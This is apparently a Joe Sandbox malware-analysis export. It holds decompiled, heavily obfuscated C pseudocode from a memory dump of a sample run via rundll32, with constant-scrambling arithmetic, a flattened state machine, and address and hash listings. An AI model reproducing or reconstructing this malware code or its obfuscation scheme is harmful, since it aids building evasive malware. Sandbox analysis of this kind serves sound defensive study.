                                                                                                                                                            				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
                                                                                                                                                            				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
                                                                                                                                                            				 *(_t426 + 0x58) = 0x9ed5c5;
                                                                                                                                                            				_t415 = 0x17;
                                                                                                                                                            				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
                                                                                                                                                            				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
                                                                                                                                                            				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
                                                                                                                                                            				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
                                                                                                                                                            				 *(_t426 + 0x5c) = 0x8fe0dc;
                                                                                                                                                            				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
                                                                                                                                                            				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
                                                                                                                                                            				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
                                                                                                                                                            				 *(_t426 + 0x48) = 0x18253c;
                                                                                                                                                            				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
                                                                                                                                                            				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
                                                                                                                                                            				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
                                                                                                                                                            				 *(_t426 + 0x94) = 0x40d4a3;
                                                                                                                                                            				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
                                                                                                                                                            				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
                                                                                                                                                            				 *(_t426 + 0x20) = 0x8fc5ff;
                                                                                                                                                            				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                                                            				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
                                                                                                                                                            				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
                                                                                                                                                            				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
                                                                                                                                                            				 *(_t426 + 0x38) = 0x52431;
                                                                                                                                                            				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
                                                                                                                                                            				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
                                                                                                                                                            				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
                                                                                                                                                            				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
                                                                                                                                                            				 *(_t426 + 0x44) = 0xc4652;
                                                                                                                                                            				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
                                                                                                                                                            				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
                                                                                                                                                            				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
                                                                                                                                                            				 *(_t426 + 0x10) = 0x2c06e;
                                                                                                                                                            				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
                                                                                                                                                            				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
                                                                                                                                                            				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
                                                                                                                                                            				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
                                                                                                                                                            				 *(_t426 + 0x7c) = 0xc3ec9d;
                                                                                                                                                            				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
                                                                                                                                                            				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
                                                                                                                                                            				 *(_t426 + 0x70) = 0x3416d6;
                                                                                                                                                            				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
                                                                                                                                                            				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
                                                                                                                                                            				 *(_t426 + 0x64) = 0x1e8df6;
                                                                                                                                                            				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
                                                                                                                                                            				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
                                                                                                                                                            				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
                                                                                                                                                            				 *(_t426 + 0x28) = 0xebc79e;
                                                                                                                                                            				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
                                                                                                                                                            				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
                                                                                                                                                            				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
                                                                                                                                                            				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
                                                                                                                                                            				 *(_t426 + 0x4c) = 0x6795aa;
                                                                                                                                                            				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
                                                                                                                                                            				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
                                                                                                                                                            				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
                                                                                                                                                            				 *(_t426 + 0x50) = 0xbc4be8;
                                                                                                                                                            				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
                                                                                                                                                            				_t416 = 0x6f;
                                                                                                                                                            				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
                                                                                                                                                            				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
                                                                                                                                                            				 *(_t426 + 0x94) = 0xde468f;
                                                                                                                                                            				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
                                                                                                                                                            				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
                                                                                                                                                            				 *(_t426 + 0x18) = 0x6e4fa6;
                                                                                                                                                            				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
                                                                                                                                                            				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
                                                                                                                                                            				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
                                                                                                                                                            				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
                                                                                                                                                            				 *(_t426 + 0x5c) = 0xc77145;
                                                                                                                                                            				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
                                                                                                                                                            				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
                                                                                                                                                            				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
                                                                                                                                                            				 *(_t426 + 0x44) = 0x492c53;
                                                                                                                                                            				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
                                                                                                                                                            				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
                                                                                                                                                            				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
                                                                                                                                                            				 *(_t426 + 0xa0) = 0x27589;
                                                                                                                                                            				_t417 = 0x3e;
                                                                                                                                                            				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
                                                                                                                                                            				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
                                                                                                                                                            				 *(_t426 + 0x30) = 0xb4bbc8;
                                                                                                                                                            				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
                                                                                                                                                            				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
                                                                                                                                                            				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
                                                                                                                                                            				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
                                                                                                                                                            				 *(_t426 + 0x28) = 0xdf5b34;
                                                                                                                                                            				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
                                                                                                                                                            				_t418 = 0x5e;
                                                                                                                                                            				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
                                                                                                                                                            				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
                                                                                                                                                            				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
                                                                                                                                                            				 *(_t426 + 0x90) = 0xff684d;
                                                                                                                                                            				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
                                                                                                                                                            				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
                                                                                                                                                            				 *(_t426 + 0x20) = 0x90e304;
                                                                                                                                                            				_t419 = 0x7f;
                                                                                                                                                            				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
                                                                                                                                                            				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
                                                                                                                                                            				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
                                                                                                                                                            				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
                                                                                                                                                            				 *(_t426 + 0x60) = 0xa4eb1a;
                                                                                                                                                            				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
                                                                                                                                                            				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
                                                                                                                                                            				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
                                                                                                                                                            				 *(_t426 + 0x34) = 0xdaab0d;
                                                                                                                                                            				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
                                                                                                                                                            				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
                                                                                                                                                            				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
                                                                                                                                                            				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
                                                                                                                                                            				 *(_t426 + 0x68) = 0xbbaf5f;
                                                                                                                                                            				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
                                                                                                                                                            				_t372 =  *(_t426 + 0x6c);
                                                                                                                                                            				_t411 =  *(_t426 + 0x6c);
                                                                                                                                                            				_t424 =  *(_t426 + 0x6c);
                                                                                                                                                            				_t420 =  *(_t426 + 0x6c);
                                                                                                                                                            				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
                                                                                                                                                            				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
                                                                                                                                                            				 *(_t426 + 0x74) = 0xfd4b1c;
                                                                                                                                                            				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
                                                                                                                                                            				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
                                                                                                                                                            				 *(_t426 + 0x88) = 0xbb9d8e;
                                                                                                                                                            				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
                                                                                                                                                            				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
                                                                                                                                                            				 *(_t426 + 0x3c) = 0x9303e6;
                                                                                                                                                            				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
                                                                                                                                                            				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
                                                                                                                                                            				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
                                                                                                                                                            				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
                                                                                                                                                            				 *(_t426 + 0x80) = 0xaf4918;
                                                                                                                                                            				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
                                                                                                                                                            				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
                                                                                                                                                            				 *(_t426 + 0x78) = 0xd8d1b1;
                                                                                                                                                            				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
                                                                                                                                                            				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t347 = 0xfb52c5;
                                                                                                                                                            					L2:
                                                                                                                                                            					while(_t374 != 0xd963e9) {
                                                                                                                                                            						if(_t374 == _t347) {
                                                                                                                                                            							_t350 = E0038C264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
                                                                                                                                                            							_t426 = _t426 + 0x2c;
                                                                                                                                                            							__eflags = _t350;
                                                                                                                                                            							if(_t350 == 0) {
                                                                                                                                                            								_t351 =  *(_t426 + 0xa0);
                                                                                                                                                            							} else {
                                                                                                                                                            								_t422 = _t411;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									__eflags = _t422[1] - 4;
                                                                                                                                                            									if(_t422[1] != 4) {
                                                                                                                                                            										goto L20;
                                                                                                                                                            									}
                                                                                                                                                            									L19:
                                                                                                                                                            									_t355 = E0037B23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
                                                                                                                                                            									_t426 = _t426 + 0x10;
                                                                                                                                                            									__eflags = _t355;
                                                                                                                                                            									if(_t355 == 0) {
                                                                                                                                                            										_t351 = 1;
                                                                                                                                                            										 *(_t426 + 0xa0) = 1;
                                                                                                                                                            									} else {
                                                                                                                                                            										goto L20;
                                                                                                                                                            									}
                                                                                                                                                            									L25:
                                                                                                                                                            									_t420 =  *(_t426 + 0x6c);
                                                                                                                                                            									goto L26;
                                                                                                                                                            									L20:
                                                                                                                                                            									_t353 =  *_t422;
                                                                                                                                                            									__eflags = _t353;
                                                                                                                                                            									if(_t353 == 0) {
                                                                                                                                                            										_t351 =  *(_t426 + 0xa0);
                                                                                                                                                            									} else {
                                                                                                                                                            										_t422 = _t422 + _t353;
                                                                                                                                                            										__eflags = _t422[1] - 4;
                                                                                                                                                            										if(_t422[1] != 4) {
                                                                                                                                                            											goto L20;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									goto L25;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							L26:
                                                                                                                                                            							__eflags = _t351;
                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                            								_t347 = 0xfb52c5;
                                                                                                                                                            								_t374 = 0xfb52c5;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t407 =  *0x393e0c; // 0x0
                                                                                                                                                            								E0038458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
                                                                                                                                                            								_t374 = 0xd963e9;
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            							L32:
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t374 == 0x247652d) {
                                                                                                                                                            								_t360 = E00378F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
                                                                                                                                                            								_t372 = _t360;
                                                                                                                                                            								_t426 = _t426 + 0x28;
                                                                                                                                                            								__eflags = _t360 - 0xffffffff;
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									_t374 = 0x7db0050;
                                                                                                                                                            									while(1) {
                                                                                                                                                            										L1:
                                                                                                                                                            										_t347 = 0xfb52c5;
                                                                                                                                                            										goto L2;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t374 == 0x4334ccc) {
                                                                                                                                                            									E0038DA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
                                                                                                                                                            									_t364 = E0037B6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
                                                                                                                                                            									_t424 = _t364;
                                                                                                                                                            									_t426 = _t426 + 0x18;
                                                                                                                                                            									_t374 = 0x247652d;
                                                                                                                                                            									 *((short*)(_t364 - 2)) = 0;
                                                                                                                                                            									while(1) {
                                                                                                                                                            										L1:
                                                                                                                                                            										_t347 = 0xfb52c5;
                                                                                                                                                            										goto L2;
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t374 == 0x7db0050) {
                                                                                                                                                            										_t420 = 0x1000;
                                                                                                                                                            										_push(_t374);
                                                                                                                                                            										_push(_t374);
                                                                                                                                                            										 *(_t426 + 0x74) = 0x1000;
                                                                                                                                                            										_t411 = E00377FF2(0x1000);
                                                                                                                                                            										_t347 = 0xfb52c5;
                                                                                                                                                            										__eflags = _t411;
                                                                                                                                                            										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
                                                                                                                                                            										continue;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t374 == 0xebf23c2) {
                                                                                                                                                            											_t374 = 0x4334ccc;
                                                                                                                                                            											continue;
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t374 != 0xf828486) {
                                                                                                                                                            												L30:
                                                                                                                                                            												__eflags = _t374 - 0x24bb42a;
                                                                                                                                                            												if(__eflags != 0) {
                                                                                                                                                            													continue;
                                                                                                                                                            												} else {
                                                                                                                                                            												}
                                                                                                                                                            											} else {
                                                                                                                                                            												E00381E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            						goto L32;
                                                                                                                                                            					}
                                                                                                                                                            					E00388519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
                                                                                                                                                            					_t374 = 0xf828486;
                                                                                                                                                            					_t347 = 0xfb52c5;
                                                                                                                                                            					goto L30;
                                                                                                                                                            				}
                                                                                                                                                            			}






















                                                                                                                                                            0x00378528
                                                                                                                                                            0x00378533
                                                                                                                                                            0x0037853e
                                                                                                                                                            0x00378549
                                                                                                                                                            0x00378555
                                                                                                                                                            0x00378558
                                                                                                                                                            0x0037855c
                                                                                                                                                            0x00378561
                                                                                                                                                            0x00378566
                                                                                                                                                            0x0037856e
                                                                                                                                                            0x00378576
                                                                                                                                                            0x00378580
                                                                                                                                                            0x00378584
                                                                                                                                                            0x0037858c
                                                                                                                                                            0x00378594
                                                                                                                                                            0x00378599
                                                                                                                                                            0x003785a1
                                                                                                                                                            0x003785a6
                                                                                                                                                            0x003785ae
                                                                                                                                                            0x003785b6
                                                                                                                                                            0x003785c0
                                                                                                                                                            0x003785c4
                                                                                                                                                            0x003785c8
                                                                                                                                                            0x003785cc
                                                                                                                                                            0x003785d0
                                                                                                                                                            0x003785d4
                                                                                                                                                            0x003785dc
                                                                                                                                                            0x003785e4
                                                                                                                                                            0x003785ec
                                                                                                                                                            0x003785f4
                                                                                                                                                            0x00378607
                                                                                                                                                            0x0037860e
                                                                                                                                                            0x00378619
                                                                                                                                                            0x00378621
                                                                                                                                                            0x00378626
                                                                                                                                                            0x00378633
                                                                                                                                                            0x00378637
                                                                                                                                                            0x0037863f
                                                                                                                                                            0x0037864a
                                                                                                                                                            0x00378655
                                                                                                                                                            0x00378660
                                                                                                                                                            0x0037866d
                                                                                                                                                            0x00378671
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037867e
                                                                                                                                                            0x0037868c
                                                                                                                                                            0x00378806
                                                                                                                                                            0x0037880b
                                                                                                                                                            0x0037880e
                                                                                                                                                            0x00378810
                                                                                                                                                            0x00378854
                                                                                                                                                            0x00378812
                                                                                                                                                            0x00378812
                                                                                                                                                            0x00378814
                                                                                                                                                            0x00378814
                                                                                                                                                            0x00378818
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037881a
                                                                                                                                                            0x00378832
                                                                                                                                                            0x00378837
                                                                                                                                                            0x0037883a
                                                                                                                                                            0x0037883c
                                                                                                                                                            0x0037884a
                                                                                                                                                            0x0037884b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378864
                                                                                                                                                            0x00378864
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037883e
                                                                                                                                                            0x0037883e
                                                                                                                                                            0x00378840
                                                                                                                                                            0x00378842
                                                                                                                                                            0x0037885d
                                                                                                                                                            0x00378844
                                                                                                                                                            0x00378844
                                                                                                                                                            0x00378814
                                                                                                                                                            0x00378818
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378818
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378842
                                                                                                                                                            0x00378814
                                                                                                                                                            0x00378868
                                                                                                                                                            0x00378868
                                                                                                                                                            0x0037886a
                                                                                                                                                            0x0037888d
                                                                                                                                                            0x00378892
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037886c
                                                                                                                                                            0x00378870
                                                                                                                                                            0x0037887d
                                                                                                                                                            0x00378883
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378883
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378692
                                                                                                                                                            0x00378698
                                                                                                                                                            0x003787b9
                                                                                                                                                            0x003787be
                                                                                                                                                            0x003787c0
                                                                                                                                                            0x003787c3
                                                                                                                                                            0x003787c6
                                                                                                                                                            0x003787cc
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x0037869e
                                                                                                                                                            0x003786a4
                                                                                                                                                            0x0037874a
                                                                                                                                                            0x00378765
                                                                                                                                                            0x0037876a
                                                                                                                                                            0x0037876c
                                                                                                                                                            0x00378771
                                                                                                                                                            0x00378776
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378679
                                                                                                                                                            0x003786aa
                                                                                                                                                            0x003786b0
                                                                                                                                                            0x003786ff
                                                                                                                                                            0x0037870e
                                                                                                                                                            0x0037870f
                                                                                                                                                            0x00378710
                                                                                                                                                            0x0037871a
                                                                                                                                                            0x0037871c
                                                                                                                                                            0x00378722
                                                                                                                                                            0x00378729
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003786b2
                                                                                                                                                            0x003786b8
                                                                                                                                                            0x003786f4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003786ba
                                                                                                                                                            0x003786c0
                                                                                                                                                            0x003788b2
                                                                                                                                                            0x003788b2
                                                                                                                                                            0x003788b8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003788be
                                                                                                                                                            0x003786c6
                                                                                                                                                            0x003786dd
                                                                                                                                                            0x003786e2
                                                                                                                                                            0x003786c0
                                                                                                                                                            0x003786b8
                                                                                                                                                            0x003786b0
                                                                                                                                                            0x003786a4
                                                                                                                                                            0x00378698
                                                                                                                                                            0x003786f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003786f1
                                                                                                                                                            0x003788a2
                                                                                                                                                            0x003788a8
                                                                                                                                                            0x003788ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003788ad

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                                                            • API String ID: 0-1837206032
                                                                                                                                                            • Opcode ID: 49e0db30fb76e32c75271f770a3bc1bdb804308cc4186c8326f62802508ffa6d
                                                                                                                                                            • Instruction ID: f7741ea3084bd1704baac270c7541f984e5f5213e8bf08680663cc5c99daba16
                                                                                                                                                            • Opcode Fuzzy Hash: 49e0db30fb76e32c75271f770a3bc1bdb804308cc4186c8326f62802508ffa6d
                                                                                                                                                            • Instruction Fuzzy Hash: 7F022F711083809FD369CF25C48AA5FBBE1FBC4758F508A1DF69A86260DBB49949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E0037E5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				void* _t170;
                                                                                                                                                            				void* _t181;
                                                                                                                                                            				void* _t184;
                                                                                                                                                            				void* _t189;
                                                                                                                                                            				void* _t192;
                                                                                                                                                            				void* _t195;
                                                                                                                                                            				void* _t197;
                                                                                                                                                            				void* _t220;
                                                                                                                                                            				signed int _t221;
                                                                                                                                                            				signed int _t222;
                                                                                                                                                            				signed int _t223;
                                                                                                                                                            				signed int* _t226;
                                                                                                                                                            
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_t219 = _a4;
                                                                                                                                                            				_t195 = __ecx;
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t170);
                                                                                                                                                            				_v56 = 0xa4c651;
                                                                                                                                                            				_t226 =  &(( &_v116)[4]);
                                                                                                                                                            				_v56 = _v56 ^ 0x6a6d8bac;
                                                                                                                                                            				_v56 = _v56 ^ 0x6ac6bd64;
                                                                                                                                                            				_t220 = 0;
                                                                                                                                                            				_v60 = 0xbac055;
                                                                                                                                                            				_t197 = 0xf39239f;
                                                                                                                                                            				_v60 = _v60 << 0xd;
                                                                                                                                                            				_v60 = _v60 ^ 0x580542e6;
                                                                                                                                                            				_v108 = 0xd580f5;
                                                                                                                                                            				_v108 = _v108 ^ 0x97cdda0d;
                                                                                                                                                            				_v108 = _v108 + 0x37dd;
                                                                                                                                                            				_v108 = _v108 >> 0xe;
                                                                                                                                                            				_v108 = _v108 ^ 0x00021113;
                                                                                                                                                            				_v52 = 0xf28435;
                                                                                                                                                            				_v52 = _v52 | 0x057a1a90;
                                                                                                                                                            				_v52 = _v52 ^ 0x05fdc129;
                                                                                                                                                            				_v80 = 0x5c8bc8;
                                                                                                                                                            				_t221 = 0x27;
                                                                                                                                                            				_v80 = _v80 / _t221;
                                                                                                                                                            				_t222 = 0x1b;
                                                                                                                                                            				_v80 = _v80 * 9;
                                                                                                                                                            				_v80 = _v80 ^ 0x0013f028;
                                                                                                                                                            				_v96 = 0x281d9a;
                                                                                                                                                            				_v96 = _v96 + 0xffff8f77;
                                                                                                                                                            				_v96 = _v96 + 0x4719;
                                                                                                                                                            				_v96 = _v96 << 0xf;
                                                                                                                                                            				_v96 = _v96 ^ 0xfa152b1c;
                                                                                                                                                            				_v112 = 0x7415d8;
                                                                                                                                                            				_v112 = _v112 >> 0xf;
                                                                                                                                                            				_v112 = _v112 + 0xfffff76c;
                                                                                                                                                            				_v112 = _v112 >> 0xd;
                                                                                                                                                            				_v112 = _v112 ^ 0x000d779a;
                                                                                                                                                            				_v88 = 0xb68707;
                                                                                                                                                            				_v88 = _v88 ^ 0x45e0ecf4;
                                                                                                                                                            				_v88 = _v88 + 0xffff71c0;
                                                                                                                                                            				_v88 = _v88 ^ 0x455519c2;
                                                                                                                                                            				_v116 = 0xceabf6;
                                                                                                                                                            				_v116 = _v116 + 0x1225;
                                                                                                                                                            				_v116 = _v116 / _t222;
                                                                                                                                                            				_v116 = _v116 >> 6;
                                                                                                                                                            				_v116 = _v116 ^ 0x0006e3bb;
                                                                                                                                                            				_v84 = 0xd525a4;
                                                                                                                                                            				_v84 = _v84 + 0xffff1243;
                                                                                                                                                            				_v84 = _v84 + 0x1c30;
                                                                                                                                                            				_v84 = _v84 ^ 0x00df7efc;
                                                                                                                                                            				_v100 = 0xf29ecf;
                                                                                                                                                            				_v100 = _v100 << 0xc;
                                                                                                                                                            				_v100 = _v100 + 0xffff4e95;
                                                                                                                                                            				_v100 = _v100 ^ 0x70d6065d;
                                                                                                                                                            				_v100 = _v100 ^ 0x593d89f0;
                                                                                                                                                            				_v104 = 0x2206c6;
                                                                                                                                                            				_v104 = _v104 | 0x38687435;
                                                                                                                                                            				_v104 = _v104 ^ 0xadcf411b;
                                                                                                                                                            				_v104 = _v104 ^ 0x9549ac77;
